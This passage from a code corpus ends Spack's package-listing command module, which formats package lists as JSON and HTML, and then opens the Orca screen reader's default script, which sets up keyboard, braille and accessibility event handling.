pkgs = [spack.repo.get(name) for name in pkg_names]
out.write('[\n')
# output name and latest version for each package
pkg_latest = ",\n".join([
' {{"name": "{0}",\n'
' "latest_version": "{1}",\n'
' "versions": {2},\n'
' "homepage": "{3}",\n'
' "file": "{4}",\n'
' "maintainers": {5},\n'
' "dependencies": {6}'
'}}'.format(
pkg.name,
VersionList(pkg.versions).preferred(),
json.dumps([str(v) for v in reversed(sorted(pkg.versions))]),
pkg.homepage,
github_url(pkg),
json.dumps(pkg.maintainers),
json.dumps(get_dependencies(pkg))
) for pkg in pkgs
])
out.write(pkg_latest)
# important: no trailing comma in JSON arrays
out.write('\n]\n')
@formatter
def html(pkg_names, out):
"""Print out information on all packages in Sphinx HTML.
This is intended to be inlined directly into Sphinx documentation.
We write HTML instead of RST for speed; generating RST from *all*
packages causes the Sphinx build to take forever. Including this as
raw HTML is much faster.
"""
# Read in all packages
pkgs = [spack.repo.get(name) for name in pkg_names]
# Start at 2 because the title of the page from Sphinx is id1.
span_id = 2
# HTML header with an increasing id span
def head(n, span_id, title, anchor=None):
if anchor is None:
anchor = title
out.write(('<span id="id%d"></span>'
'<h1>%s<a class="headerlink" href="#%s" '
'title="Permalink to this headline">¶</a>'
'</h1>\n') % (span_id, title, anchor))
# Start with the number of packages, skipping the title and intro
# blurb, which we maintain in the RST file.
out.write('<p>\n')
out.write('Spack currently has %d mainline packages:\n' % len(pkgs))
out.write('</p>\n')
# Table of links to all packages
out.write('<table border="1" class="docutils">\n')
out.write('<tbody valign="top">\n')
for i, row in enumerate(rows_for_ncols(pkg_names, 3)):
out.write('<tr class="row-odd">\n' if i % 2 == 0 else
'<tr class="row-even">\n')
for name in row:
out.write('<td>\n')
out.write('<a class="reference internal" href="#%s">%s</a></td>\n'
% (name, name))
out.write('</td>\n')
out.write('</tr>\n')
out.write('</tbody>\n')
out.write('</table>\n')
out.write('<hr class="docutils"/>\n')
# Output some text for each package.
for pkg in pkgs:
out.write('<div class="section" id="%s">\n' % pkg.name)
head(2, span_id, pkg.name)
span_id += 1
out.write('<dl class="docutils">\n')
out.write('<dt>Homepage:</dt>\n')
out.write('<dd><ul class="first last simple">\n')
out.write(('<li>'
'<a class="reference external" href="%s">%s</a>'
'</li>\n') % (pkg.homepage, escape(pkg.homepage, True)))
out.write('</ul></dd>\n')
out.write('<dt>Spack package:</dt>\n')
out.write('<dd><ul class="first last simple">\n')
out.write(('<li>'
'<a class="reference external" href="%s">%s/package.py</a>'
'</li>\n') % (github_url(pkg), pkg.name))
out.write('</ul></dd>\n')
if pkg.versions:
out.write('<dt>Versions:</dt>\n')
out.write('<dd>\n')
out.write(', '.join(
str(v) for v in reversed(sorted(pkg.versions))))
out.write('\n')
out.write('</dd>\n')
for deptype in spack.dependency.all_deptypes:
deps = pkg.dependencies_of_type(deptype)
if deps:
out.write('<dt>%s Dependencies:</dt>\n' % deptype.capitalize())
out.write('<dd>\n')
out.write(', '.join(
d if d not in pkg_names else
'<a class="reference internal" href="#%s">%s</a>' % (d, d)
for d in deps))
out.write('\n')
out.write('</dd>\n')
out.write('<dt>Description:</dt>\n')
out.write('<dd>\n')
out.write(escape(pkg.format_doc(indent=2), True))
out.write('\n')
out.write('</dd>\n')
out.write('</dl>\n')
out.write('<hr class="docutils"/>\n')
out.write('</div>\n')
def list(parser, args):
# retrieve the formatter to use from args
formatter = formatters[args.format]
# Retrieve the names of all the packages
pkgs = set(spack.repo.all_package_names())
# Filter the set appropriately
sorted_packages = filter_by_name(pkgs, args)
# Filter by tags
if args.tags:
packages_with_tags = set(
spack.repo.path.packages_with_tags(*args.tags))
sorted_packages = set(sorted_packages) & packages_with_tags
sorted_packages = sorted(sorted_packages)
if args.update:
# change output stream if user asked for update
if os.path.exists(args.update):
if os.path.getmtime(args.update) > spack.repo.path.last_mtime():
tty.msg('File is up to date: %s' % args.update)
return
tty.msg('Updating file: %s' % args.update)
with open(args.update, 'w') as f:
formatter(sorted_packages, f)
else:
# Print to stdout
formatter(sorted_packages, sys.stdout)
|
rspavel/spack
|
lib/spack/spack/cmd/list.py
|
Python
|
lgpl-2.1
| 9,244
|
# Orca
#
# Copyright 2004-2009 Sun Microsystems Inc.
# Copyright 2010 Joanmarie Diggs
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
"""The default Script for presenting information to the user using
both speech and Braille. This is based primarily on the de-facto
standard implementation of the AT-SPI, which is the GAIL support
for GTK."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2004-2009 Sun Microsystems Inc." \
"Copyright (c) 2010 Joanmarie Diggs"
__license__ = "LGPL"
import time
from gi.repository import Gtk, Gdk
import pyatspi
import orca.braille as braille
import orca.chnames as chnames
import orca.cmdnames as cmdnames
import orca.debug as debug
import orca.eventsynthesizer as eventsynthesizer
import orca.find as find
import orca.flat_review as flat_review
import orca.guilabels as guilabels
import orca.input_event as input_event
import orca.keybindings as keybindings
import orca.messages as messages
import orca.orca as orca
import orca.orca_gui_commandlist as commandlist
import orca.orca_state as orca_state
import orca.phonnames as phonnames
import orca.sound_utils as sound_utils
import orca.script as script
import orca.settings as settings
import orca.settings_manager as settings_manager
import orca.speech as speech
import orca.speechserver as speechserver
import orca.mouse_review as mouse_review
import orca.notification_messages as notification_messages
_settingsManager = settings_manager.getManager()
########################################################################
# #
# The Default script class. #
# #
########################################################################
class Script(script.Script):
EMBEDDED_OBJECT_CHARACTER = '\ufffc'
NO_BREAK_SPACE_CHARACTER = '\u00a0'
# generatorCache
#
DISPLAYED_LABEL = 'displayedLabel'
DISPLAYED_TEXT = 'displayedText'
KEY_BINDING = 'keyBinding'
NESTING_LEVEL = 'nestingLevel'
NODE_LEVEL = 'nodeLevel'
REAL_ACTIVE_DESCENDANT = 'realActiveDescendant'
def __init__(self, app):
"""Creates a new script for the given application.
Arguments:
- app: the application to create a script for.
"""
script.Script.__init__(self, app)
self.flatReviewContext = None
self.windowActivateTime = None
self.targetCursorCell = None
self.sound = sound_utils.SoundUtils()
self.sound.createSimplePipeline()
self.justEnteredFlatReviewMode = False
self.digits = '0123456789'
self.whitespace = ' \t\n\r\v\f'
# Unicode currency symbols (populated by the
# getUnicodeCurrencySymbols() routine).
#
self._unicodeCurrencySymbols = []
# Used to determine whether progress bar value changes presented.
self.lastProgressBarTime = {}
self.lastProgressBarValue = {}
self.lastSelectedMenu = None
# A dictionary of non-standardly-named text attributes and their
# Atk equivalents.
#
self.attributeNamesDict = {}
# Keep track of the last time we issued a mouse routing command
# so that we can guess if a change resulted from our moving the
# pointer.
#
self.lastMouseRoutingTime = None
# The last location of the mouse, which we might want if routing
# the pointer elsewhere.
#
self.oldMouseCoordinates = [0, 0]
# Used to copy/append the current flat review contents to the
# clipboard.
#
self.currentReviewContents = ""
self._lastWord = ""
self._lastWordCheckedForSpelling = ""
self._inSayAll = False
self._sayAllIsInterrupted = False
self._sayAllContexts = []
if app:
app.setCacheMask(
pyatspi.cache.DEFAULT ^ pyatspi.cache.CHILDREN ^ pyatspi.cache.NAME)
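# A note on the cache mask above: XOR-ing a composite bit mask with flags
# that are set in it clears those flags. A tiny self-contained sketch with
# made-up flag values (not the real pyatspi constants):
#
#   CHILDREN, NAME, ROLE = 0x1, 0x2, 0x4
#   DEFAULT = CHILDREN | NAME | ROLE
#   assert DEFAULT ^ CHILDREN ^ NAME == ROLE  # only ROLE remains set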
def setupInputEventHandlers(self):
"""Defines InputEventHandler fields for this script that can be
called by the key and braille bindings."""
self.inputEventHandlers["routePointerToItemHandler"] = \
input_event.InputEventHandler(
Script.routePointerToItem,
cmdnames.ROUTE_POINTER_TO_ITEM)
self.inputEventHandlers["leftClickReviewItemHandler"] = \
input_event.InputEventHandler(
Script.leftClickReviewItem,
cmdnames.LEFT_CLICK_REVIEW_ITEM)
self.inputEventHandlers["rightClickReviewItemHandler"] = \
input_event.InputEventHandler(
Script.rightClickReviewItem,
cmdnames.RIGHT_CLICK_REVIEW_ITEM)
self.inputEventHandlers["sayAllHandler"] = \
input_event.InputEventHandler(
Script.sayAll,
cmdnames.SAY_ALL)
self.inputEventHandlers["whereAmIBasicHandler"] = \
input_event.InputEventHandler(
Script.whereAmIBasic,
cmdnames.WHERE_AM_I_BASIC)
self.inputEventHandlers["whereAmIDetailedHandler"] = \
input_event.InputEventHandler(
Script.whereAmIDetailed,
cmdnames.WHERE_AM_I_DETAILED)
self.inputEventHandlers["getTitleHandler"] = \
input_event.InputEventHandler(
Script.presentTitle,
cmdnames.PRESENT_TITLE)
self.inputEventHandlers["getStatusBarHandler"] = \
input_event.InputEventHandler(
Script.presentStatusBar,
cmdnames.PRESENT_STATUS_BAR)
self.inputEventHandlers["findHandler"] = \
input_event.InputEventHandler(
orca.showFindGUI,
cmdnames.SHOW_FIND_GUI)
self.inputEventHandlers["findNextHandler"] = \
input_event.InputEventHandler(
Script.findNext,
cmdnames.FIND_NEXT)
self.inputEventHandlers["findPreviousHandler"] = \
input_event.InputEventHandler(
Script.findPrevious,
cmdnames.FIND_PREVIOUS)
self.inputEventHandlers["toggleFlatReviewModeHandler"] = \
input_event.InputEventHandler(
Script.toggleFlatReviewMode,
cmdnames.TOGGLE_FLAT_REVIEW)
self.inputEventHandlers["reviewPreviousLineHandler"] = \
input_event.InputEventHandler(
Script.reviewPreviousLine,
cmdnames.REVIEW_PREVIOUS_LINE)
self.inputEventHandlers["reviewHomeHandler"] = \
input_event.InputEventHandler(
Script.reviewHome,
cmdnames.REVIEW_HOME)
self.inputEventHandlers["reviewCurrentLineHandler"] = \
input_event.InputEventHandler(
Script.reviewCurrentLine,
cmdnames.REVIEW_CURRENT_LINE)
self.inputEventHandlers["reviewSpellCurrentLineHandler"] = \
input_event.InputEventHandler(
Script.reviewSpellCurrentLine,
cmdnames.REVIEW_SPELL_CURRENT_LINE)
self.inputEventHandlers["reviewPhoneticCurrentLineHandler"] = \
input_event.InputEventHandler(
Script.reviewPhoneticCurrentLine,
cmdnames.REVIEW_PHONETIC_CURRENT_LINE)
self.inputEventHandlers["reviewNextLineHandler"] = \
input_event.InputEventHandler(
Script.reviewNextLine,
cmdnames.REVIEW_NEXT_LINE)
self.inputEventHandlers["reviewEndHandler"] = \
input_event.InputEventHandler(
Script.reviewEnd,
cmdnames.REVIEW_END)
self.inputEventHandlers["reviewPreviousItemHandler"] = \
input_event.InputEventHandler(
Script.reviewPreviousItem,
cmdnames.REVIEW_PREVIOUS_ITEM)
self.inputEventHandlers["reviewAboveHandler"] = \
input_event.InputEventHandler(
Script.reviewAbove,
cmdnames.REVIEW_ABOVE)
self.inputEventHandlers["reviewCurrentItemHandler"] = \
input_event.InputEventHandler(
Script.reviewCurrentItem,
cmdnames.REVIEW_CURRENT_ITEM)
self.inputEventHandlers["reviewSpellCurrentItemHandler"] = \
input_event.InputEventHandler(
Script.reviewSpellCurrentItem,
cmdnames.REVIEW_SPELL_CURRENT_ITEM)
self.inputEventHandlers["reviewPhoneticCurrentItemHandler"] = \
input_event.InputEventHandler(
Script.reviewPhoneticCurrentItem,
cmdnames.REVIEW_PHONETIC_CURRENT_ITEM)
self.inputEventHandlers["reviewNextItemHandler"] = \
input_event.InputEventHandler(
Script.reviewNextItem,
cmdnames.REVIEW_NEXT_ITEM)
self.inputEventHandlers["reviewCurrentAccessibleHandler"] = \
input_event.InputEventHandler(
Script.reviewCurrentAccessible,
cmdnames.REVIEW_CURRENT_ACCESSIBLE)
self.inputEventHandlers["reviewBelowHandler"] = \
input_event.InputEventHandler(
Script.reviewBelow,
cmdnames.REVIEW_BELOW)
self.inputEventHandlers["reviewPreviousCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewPreviousCharacter,
cmdnames.REVIEW_PREVIOUS_CHARACTER)
self.inputEventHandlers["reviewEndOfLineHandler"] = \
input_event.InputEventHandler(
Script.reviewEndOfLine,
cmdnames.REVIEW_END_OF_LINE)
self.inputEventHandlers["reviewBottomLeftHandler"] = \
input_event.InputEventHandler(
Script.reviewBottomLeft,
cmdnames.REVIEW_BOTTOM_LEFT)
self.inputEventHandlers["reviewCurrentCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewCurrentCharacter,
cmdnames.REVIEW_CURRENT_CHARACTER)
self.inputEventHandlers["reviewSpellCurrentCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewSpellCurrentCharacter,
cmdnames.REVIEW_SPELL_CURRENT_CHARACTER)
self.inputEventHandlers["reviewUnicodeCurrentCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewUnicodeCurrentCharacter,
cmdnames.REVIEW_UNICODE_CURRENT_CHARACTER)
self.inputEventHandlers["reviewNextCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewNextCharacter,
cmdnames.REVIEW_NEXT_CHARACTER)
self.inputEventHandlers["flatReviewCopyHandler"] = \
input_event.InputEventHandler(
Script.flatReviewCopy,
cmdnames.FLAT_REVIEW_COPY)
self.inputEventHandlers["flatReviewAppendHandler"] = \
input_event.InputEventHandler(
Script.flatReviewAppend,
cmdnames.FLAT_REVIEW_APPEND)
self.inputEventHandlers["toggleTableCellReadModeHandler"] = \
input_event.InputEventHandler(
Script.toggleTableCellReadMode,
cmdnames.TOGGLE_TABLE_CELL_READ_MODE)
self.inputEventHandlers["readCharAttributesHandler"] = \
input_event.InputEventHandler(
Script.readCharAttributes,
cmdnames.READ_CHAR_ATTRIBUTES)
self.inputEventHandlers["panBrailleLeftHandler"] = \
input_event.InputEventHandler(
Script.panBrailleLeft,
cmdnames.PAN_BRAILLE_LEFT,
False) # Do not enable learn mode for this action
self.inputEventHandlers["panBrailleRightHandler"] = \
input_event.InputEventHandler(
Script.panBrailleRight,
cmdnames.PAN_BRAILLE_RIGHT,
False) # Do not enable learn mode for this action
self.inputEventHandlers["goBrailleHomeHandler"] = \
input_event.InputEventHandler(
Script.goBrailleHome,
cmdnames.GO_BRAILLE_HOME)
self.inputEventHandlers["contractedBrailleHandler"] = \
input_event.InputEventHandler(
Script.setContractedBraille,
cmdnames.SET_CONTRACTED_BRAILLE)
self.inputEventHandlers["processRoutingKeyHandler"] = \
input_event.InputEventHandler(
Script.processRoutingKey,
cmdnames.PROCESS_ROUTING_KEY)
self.inputEventHandlers["processBrailleCutBeginHandler"] = \
input_event.InputEventHandler(
Script.processBrailleCutBegin,
cmdnames.PROCESS_BRAILLE_CUT_BEGIN)
self.inputEventHandlers["processBrailleCutLineHandler"] = \
input_event.InputEventHandler(
Script.processBrailleCutLine,
cmdnames.PROCESS_BRAILLE_CUT_LINE)
self.inputEventHandlers["enterLearnModeHandler"] = \
input_event.InputEventHandler(
Script.enterLearnMode,
cmdnames.ENTER_LEARN_MODE)
self.inputEventHandlers["decreaseSpeechRateHandler"] = \
input_event.InputEventHandler(
speech.decreaseSpeechRate,
cmdnames.DECREASE_SPEECH_RATE)
self.inputEventHandlers["increaseSpeechRateHandler"] = \
input_event.InputEventHandler(
speech.increaseSpeechRate,
cmdnames.INCREASE_SPEECH_RATE)
self.inputEventHandlers["decreaseSpeechPitchHandler"] = \
input_event.InputEventHandler(
speech.decreaseSpeechPitch,
cmdnames.DECREASE_SPEECH_PITCH)
self.inputEventHandlers["increaseSpeechPitchHandler"] = \
input_event.InputEventHandler(
speech.increaseSpeechPitch,
cmdnames.INCREASE_SPEECH_PITCH)
self.inputEventHandlers["decreaseSpeechVolumeHandler"] = \
input_event.InputEventHandler(
speech.decreaseSpeechVolume,
cmdnames.DECREASE_SPEECH_VOLUME)
self.inputEventHandlers["increaseSpeechVolumeHandler"] = \
input_event.InputEventHandler(
speech.increaseSpeechVolume,
cmdnames.INCREASE_SPEECH_VOLUME)
self.inputEventHandlers["shutdownHandler"] = \
input_event.InputEventHandler(
orca.quitOrca,
cmdnames.QUIT_ORCA)
self.inputEventHandlers["preferencesSettingsHandler"] = \
input_event.InputEventHandler(
orca.showPreferencesGUI,
cmdnames.SHOW_PREFERENCES_GUI)
self.inputEventHandlers["appPreferencesSettingsHandler"] = \
input_event.InputEventHandler(
orca.showAppPreferencesGUI,
cmdnames.SHOW_APP_PREFERENCES_GUI)
self.inputEventHandlers["toggleSilenceSpeechHandler"] = \
input_event.InputEventHandler(
Script.toggleSilenceSpeech,
cmdnames.TOGGLE_SPEECH)
self.inputEventHandlers["toggleSpeechVerbosityHandler"] = \
input_event.InputEventHandler(
Script.toggleSpeechVerbosity,
cmdnames.TOGGLE_SPEECH_VERBOSITY)
self.inputEventHandlers[ \
"toggleSpeakingIndentationJustificationHandler"] = \
input_event.InputEventHandler(
Script.toggleSpeakingIndentationJustification,
cmdnames.TOGGLE_SPOKEN_INDENTATION_AND_JUSTIFICATION)
self.inputEventHandlers["cycleSpeakingPunctuationLevelHandler"] = \
input_event.InputEventHandler(
Script.cycleSpeakingPunctuationLevel,
cmdnames.CYCLE_PUNCTUATION_LEVEL)
self.inputEventHandlers["cycleSettingsProfileHandler"] = \
input_event.InputEventHandler(
Script.cycleSettingsProfile,
cmdnames.CYCLE_SETTINGS_PROFILE)
self.inputEventHandlers["cycleCapitalizationStyleHandler"] = \
input_event.InputEventHandler(
Script.cycleCapitalizationStyle,
cmdnames.CYCLE_CAPITALIZATION_STYLE)
self.inputEventHandlers["cycleKeyEchoHandler"] = \
input_event.InputEventHandler(
Script.cycleKeyEcho,
cmdnames.CYCLE_KEY_ECHO)
self.inputEventHandlers["cycleDebugLevelHandler"] = \
input_event.InputEventHandler(
Script.cycleDebugLevel,
cmdnames.CYCLE_DEBUG_LEVEL)
self.inputEventHandlers["goToPrevBookmark"] = \
input_event.InputEventHandler(
Script.goToPrevBookmark,
cmdnames.BOOKMARK_GO_TO_PREVIOUS)
self.inputEventHandlers["goToBookmark"] = \
input_event.InputEventHandler(
Script.goToBookmark,
cmdnames.BOOKMARK_GO_TO)
self.inputEventHandlers["goToNextBookmark"] = \
input_event.InputEventHandler(
Script.goToNextBookmark,
cmdnames.BOOKMARK_GO_TO_NEXT)
self.inputEventHandlers["addBookmark"] = \
input_event.InputEventHandler(
Script.addBookmark,
cmdnames.BOOKMARK_ADD)
self.inputEventHandlers["saveBookmarks"] = \
input_event.InputEventHandler(
Script.saveBookmarks,
cmdnames.BOOKMARK_SAVE)
self.inputEventHandlers["toggleMouseReviewHandler"] = \
input_event.InputEventHandler(
mouse_review.toggle,
cmdnames.MOUSE_REVIEW_TOGGLE)
self.inputEventHandlers["presentTimeHandler"] = \
input_event.InputEventHandler(
Script.presentTime,
cmdnames.PRESENT_CURRENT_TIME)
self.inputEventHandlers["presentDateHandler"] = \
input_event.InputEventHandler(
Script.presentDate,
cmdnames.PRESENT_CURRENT_DATE)
self.inputEventHandlers["bypassNextCommandHandler"] = \
input_event.InputEventHandler(
Script.bypassNextCommand,
cmdnames.BYPASS_NEXT_COMMAND)
self.inputEventHandlers.update(notification_messages.inputEventHandlers)
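# Illustrative sketch (hypothetical names, not part of this file): an
# application script that subclasses this Script can extend the table by
# chaining up and registering one more handler:
#
#   def setupInputEventHandlers(self):
#       default.Script.setupInputEventHandlers(self)
#       self.inputEventHandlers["myAppHandler"] = \
#           input_event.InputEventHandler(
#               Script.myAppCommand,
#               "Performs an app-specific command.")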
def getInputEventHandlerKey(self, inputEventHandler):
"""Returns the name of the key that contains an inputEventHadler
passed as argument
"""
for keyName, handler in list(self.inputEventHandlers.items()):
if handler == inputEventHandler:
return keyName
return None
def getListeners(self):
"""Sets up the AT-SPI event listeners for this script.
"""
listeners = script.Script.getListeners(self)
listeners["focus:"] = \
self.onFocus
#listeners["keyboard:modifiers"] = \
# self.noOp
listeners["document:reload"] = \
self.onDocumentReload
listeners["document:load-complete"] = \
self.onDocumentLoadComplete
listeners["document:load-stopped"] = \
self.onDocumentLoadStopped
listeners["mouse:button"] = \
self.onMouseButton
listeners["object:property-change:accessible-name"] = \
self.onNameChanged
listeners["object:text-caret-moved"] = \
self.onCaretMoved
listeners["object:text-changed:delete"] = \
self.onTextDeleted
listeners["object:text-changed:insert"] = \
self.onTextInserted
listeners["object:active-descendant-changed"] = \
self.onActiveDescendantChanged
listeners["object:children-changed"] = \
self.onChildrenChanged
listeners["object:state-changed:active"] = \
self.onActiveChanged
listeners["object:state-changed:busy"] = \
self.onBusyChanged
listeners["object:state-changed:focused"] = \
self.onFocusedChanged
listeners["object:state-changed:showing"] = \
self.onShowingChanged
listeners["object:state-changed:checked"] = \
self.onCheckedChanged
listeners["object:state-changed:pressed"] = \
self.onPressedChanged
listeners["object:state-changed:indeterminate"] = \
self.onIndeterminateChanged
listeners["object:state-changed:expanded"] = \
self.onExpandedChanged
listeners["object:state-changed:selected"] = \
self.onSelectedChanged
listeners["object:state-changed:sensitive"] = \
self.onSensitiveChanged
listeners["object:text-attributes-changed"] = \
self.onTextAttributesChanged
listeners["object:text-selection-changed"] = \
self.onTextSelectionChanged
listeners["object:selection-changed"] = \
self.onSelectionChanged
listeners["object:property-change:accessible-value"] = \
self.onValueChanged
listeners["object:value-changed"] = \
self.onValueChanged
listeners["object:column-reordered"] = \
self.onColumnReordered
listeners["object:row-reordered"] = \
self.onRowReordered
listeners["window:activate"] = \
self.onWindowActivated
listeners["window:deactivate"] = \
self.onWindowDeactivated
listeners["window:create"] = \
self.onWindowCreated
return listeners
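# Subclasses extend the listener table the same way. A minimal sketch,
# with a hypothetical callback name:
#
#   def getListeners(self):
#       listeners = default.Script.getListeners(self)
#       listeners["object:text-caret-moved"] = self.myOnCaretMoved
#       return listeners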
def __getDesktopBindings(self):
"""Returns an instance of keybindings.KeyBindings that use the
numeric keypad for focus tracking and flat review.
"""
import orca.desktop_keyboardmap as desktop_keyboardmap
keyBindings = keybindings.KeyBindings()
keyBindings.load(desktop_keyboardmap.keymap, self.inputEventHandlers)
return keyBindings
def __getLaptopBindings(self):
"""Returns an instance of keybindings.KeyBindings that use the
main keyboard keys for focus tracking and flat review.
"""
import orca.laptop_keyboardmap as laptop_keyboardmap
keyBindings = keybindings.KeyBindings()
keyBindings.load(laptop_keyboardmap.keymap, self.inputEventHandlers)
return keyBindings
def getKeyBindings(self):
"""Defines the key bindings for this script.
Returns an instance of keybindings.KeyBindings.
"""
keyBindings = script.Script.getKeyBindings(self)
bindings = self.getDefaultKeyBindings()
for keyBinding in bindings.keyBindings:
keyBindings.add(keyBinding)
bindings = self.getToolkitKeyBindings()
for keyBinding in bindings.keyBindings:
keyBindings.add(keyBinding)
bindings = self.getAppKeyBindings()
for keyBinding in bindings.keyBindings:
keyBindings.add(keyBinding)
try:
keyBindings = _settingsManager.overrideKeyBindings(self, keyBindings)
except:
debug.println(debug.LEVEL_WARNING,
"WARNING: problem overriding keybindings:")
debug.printException(debug.LEVEL_WARNING)
return keyBindings
def getDefaultKeyBindings(self):
"""Returns the default script's keybindings, i.e. without any of
the toolkit or application specific commands added."""
keyBindings = keybindings.KeyBindings()
layout = _settingsManager.getSetting('keyboardLayout')
if layout == settings.GENERAL_KEYBOARD_LAYOUT_DESKTOP:
for keyBinding in self.__getDesktopBindings().keyBindings:
keyBindings.add(keyBinding)
else:
for keyBinding in self.__getLaptopBindings().keyBindings:
keyBindings.add(keyBinding)
import orca.common_keyboardmap as common_keyboardmap
keyBindings.load(common_keyboardmap.keymap, self.inputEventHandlers)
return keyBindings
def getBrailleBindings(self):
"""Defines the braille bindings for this script.
Returns a dictionary where the keys are BrlTTY commands and the
values are InputEventHandler instances.
"""
brailleBindings = script.Script.getBrailleBindings(self)
try:
brailleBindings[braille.brlapi.KEY_CMD_FWINLT] = \
self.inputEventHandlers["panBrailleLeftHandler"]
brailleBindings[braille.brlapi.KEY_CMD_FWINRT] = \
self.inputEventHandlers["panBrailleRightHandler"]
brailleBindings[braille.brlapi.KEY_CMD_LNUP] = \
self.inputEventHandlers["reviewAboveHandler"]
brailleBindings[braille.brlapi.KEY_CMD_LNDN] = \
self.inputEventHandlers["reviewBelowHandler"]
brailleBindings[braille.brlapi.KEY_CMD_FREEZE] = \
self.inputEventHandlers["toggleFlatReviewModeHandler"]
brailleBindings[braille.brlapi.KEY_CMD_TOP_LEFT] = \
self.inputEventHandlers["reviewHomeHandler"]
brailleBindings[braille.brlapi.KEY_CMD_BOT_LEFT] = \
self.inputEventHandlers["reviewBottomLeftHandler"]
brailleBindings[braille.brlapi.KEY_CMD_HOME] = \
self.inputEventHandlers["goBrailleHomeHandler"]
brailleBindings[braille.brlapi.KEY_CMD_SIXDOTS] = \
self.inputEventHandlers["contractedBrailleHandler"]
brailleBindings[braille.brlapi.KEY_CMD_ROUTE] = \
self.inputEventHandlers["processRoutingKeyHandler"]
brailleBindings[braille.brlapi.KEY_CMD_CUTBEGIN] = \
self.inputEventHandlers["processBrailleCutBeginHandler"]
brailleBindings[braille.brlapi.KEY_CMD_CUTLINE] = \
self.inputEventHandlers["processBrailleCutLineHandler"]
except AttributeError:
debug.println(debug.LEVEL_CONFIGURATION,
"WARNING: braille bindings unavailable:")
except:
debug.println(debug.LEVEL_CONFIGURATION,
"WARNING: braille bindings unavailable:")
debug.printException(debug.LEVEL_CONFIGURATION)
return brailleBindings
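# The try/except above guards against braille.brlapi being unavailable
# (e.g. BrlTTY is not installed), in which case the KEY_CMD_* attributes
# do not exist. A standalone sketch of the same defensive pattern
# (someHandler is a placeholder):
#
#   bindings = {}
#   try:
#       bindings[braille.brlapi.KEY_CMD_HOME] = someHandler
#   except AttributeError:
#       pass  # no brlapi; leave the braille table empty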
def deactivate(self):
"""Called when this script is deactivated."""
self._inSayAll = False
self._sayAllIsInterrupted = False
self.pointOfReference = {}
def processKeyboardEvent(self, keyboardEvent):
"""Processes the given keyboard event. It uses the super
class equivalent to do most of the work. The only thing done here
is to detect when the user is trying to get out of learn mode.
Arguments:
- keyboardEvent: an instance of input_event.KeyboardEvent
"""
return script.Script.processKeyboardEvent(self, keyboardEvent)
def _saveFocusedObjectInfo(self, obj):
"""Saves some basic information about obj. Note that this method is
intended to be called primarily (if not only) by locusOfFocusChanged().
It is expected that accessible event callbacks will update the point
of reference data specific to that event. The goal here is to weed
out duplicate events."""
if not obj:
return
try:
role = obj.getRole()
state = obj.getState()
name = obj.name
except:
return
# We want to save the name because some apps and toolkits emit name
# changes after the focus or selection has changed, even though the
# name has not.
names = self.pointOfReference.get('names', {})
names[hash(obj)] = name
self.pointOfReference['names'] = names
# We want to save the offset for text objects because some apps and
# toolkits emit caret-moved events immediately after a text object
# gains focus, even though the caret has not actually moved.
try:
text = obj.queryText()
except:
pass
else:
self._saveLastCursorPosition(obj, max(0, text.caretOffset))
textSelections = self.pointOfReference.get('textSelections', {})
textSelections[hash(obj)] = text.getSelection(0)
self.pointOfReference['textSelections'] = textSelections
# We want to save the current row and column of a newly focused
# or selected table cell so that on subsequent cell focus/selection
# we only present the changed location.
if role == pyatspi.ROLE_TABLE_CELL:
try:
table = obj.parent.queryTable()
except:
pass
else:
index = self.utilities.cellIndex(obj)
column = table.getColumnAtIndex(index)
row = table.getRowAtIndex(index)
self.pointOfReference['lastColumn'] = column
self.pointOfReference['lastRow'] = row
else:
self.pointOfReference['lastColumn'] = -1
self.pointOfReference['lastRow'] = -1
self.pointOfReference['checkedChange'] = \
hash(obj), state.contains(pyatspi.STATE_CHECKED)
def locusOfFocusChanged(self, event, oldLocusOfFocus, newLocusOfFocus):
"""Called when the visual object with focus changes.
Arguments:
- event: if not None, the Event that caused the change
- oldLocusOfFocus: Accessible that is the old locus of focus
- newLocusOfFocus: Accessible that is the new locus of focus
"""
if not newLocusOfFocus:
orca_state.noFocusTimeStamp = time.time()
return
if newLocusOfFocus.getState().contains(pyatspi.STATE_DEFUNCT):
return
if self.utilities.isSameObject(oldLocusOfFocus, newLocusOfFocus):
return
try:
if self.findCommandRun:
# Then the Orca Find dialog has just given up focus
# to the original window. We don't want to speak
# the window title, current line, etc.
return
except:
pass
if self.flatReviewContext:
self.toggleFlatReviewMode()
self.updateBraille(newLocusOfFocus)
shouldNotInterrupt = \
self.windowActivateTime and time.time() - self.windowActivateTime < 1
# [[[TODO: WDW - this should move to the generator.]]]
if newLocusOfFocus.getRole() == pyatspi.ROLE_LINK:
voice = self.voices[settings.HYPERLINK_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
utterances = self.speechGenerator.generateSpeech(
newLocusOfFocus,
priorObj=oldLocusOfFocus)
speech.speak(utterances, voice, not shouldNotInterrupt)
self._saveFocusedObjectInfo(newLocusOfFocus)
def activate(self):
"""Called when this script is activated."""
_settingsManager.loadAppSettings(self)
braille.setupKeyRanges(list(self.brailleBindings.keys()))
speech.updatePunctuationLevel()
def updateBraille(self, obj, extraRegion=None):
"""Updates the braille display to show the give object.
Arguments:
- obj: the Accessible
- extra: extra Region to add to the end
"""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: update disabled")
return
if not obj:
return
self.clearBraille()
line = self.getNewBrailleLine()
braille.addLine(line)
result = self.brailleGenerator.generateBraille(obj)
self.addBrailleRegionsToLine(result[0], line)
if extraRegion:
self.addBrailleRegionToLine(extraRegion, line)
if extraRegion:
self.setBrailleFocus(extraRegion)
else:
self.setBrailleFocus(result[1])
self.refreshBraille(True)
########################################################################
# #
# INPUT EVENT HANDLERS (AKA ORCA COMMANDS) #
